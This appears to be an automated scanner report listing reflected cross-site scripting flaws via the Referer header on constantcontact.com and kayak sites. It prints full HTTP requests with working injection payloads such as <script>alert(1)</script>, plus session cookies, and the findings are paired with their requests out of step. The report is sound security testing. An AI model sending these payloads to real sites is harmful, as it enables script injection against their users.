GET /online-surveys/index.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Referer: http://www.google.com/search?hl=en&q=d92b0'-alert(1)-'809b333c2b4
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f037'-alert(1)-'9df9485a1e8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /partners/index.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Referer: http://www.google.com/search?hl=en&q=6f037'-alert(1)-'9df9485a1e8
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adf49'-alert(1)-'f71f56da08c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy_guarantee.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Referer: http://www.google.com/search?hl=en&q=adf49'-alert(1)-'f71f56da08c
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dee4'-alert(1)-'dec3fdf6f7d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /safesubscribe.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=5dee4'-alert(1)-'dec3fdf6f7d
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62bc5'-alert(1)-'b0f0c081473 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/index.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Referer: http://www.google.com/search?hl=en&q=62bc5'-alert(1)-'b0f0c081473
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4431'-alert(1)-'ff1d5ab7833 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /social-media-for-small-business/index.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Referer: http://www.google.com/search?hl=en&q=b4431'-alert(1)-'ff1d5ab7833
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd15d'-alert(1)-'616e6329ef8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /add-product.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Referer: http://www.google.com/search?hl=en&q=fd15d'-alert(1)-'616e6329ef8
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b09a'-alert(1)-'1f4726bf6d4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e349b'-alert(1)-'373f4a67583 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /login.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Referer: http://www.google.com/search?hl=en&q=e349b'-alert(1)-'373f4a67583
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8143'-alert(1)-'165eb539b6f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /styles.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Referer: http://www.google.com/search?hl=en&q=c8143'-alert(1)-'165eb539b6f
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 214fb<script>alert(1)</script>cda75429062 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /h/landing HTTP/1.1 Host: www.kayak.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=214fb<script>alert(1)</script>cda75429062
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload f5c87<script>alert(1)</script>bb7e5712fd5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /in HTTP/1.1 Host: www.kayak.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=f5c87<script>alert(1)</script>bb7e5712fd5
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 14baf<script>alert(1)</script>6c9cba6cead was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /s/search/air HTTP/1.1 Host: www.kayak.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=14baf<script>alert(1)</script>6c9cba6cead
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 57f72<script>alert(1)</script>4c70815b771 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /s/search/hotel HTTP/1.1 Host: www.kayak.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=57f72<script>alert(1)</script>4c70815b771
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 126ae<script>alert(1)</script>108cc871de4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /h/landing HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=126ae<script>alert(1)</script>108cc871de4
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e0360<script>alert(1)</script>8f60ad9717d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /in HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e0360<script>alert(1)</script>8f60ad9717d
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 27d23<script>alert(1)</script>e4b1db856b3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /s/search/air HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=27d23<script>alert(1)</script>e4b1db856b3
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload fa57c<script>alert(1)</script>506961b9c65 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /s/search/hotel HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=fa57c<script>alert(1)</script>506961b9c65
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd793"><a>a612ce35013 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
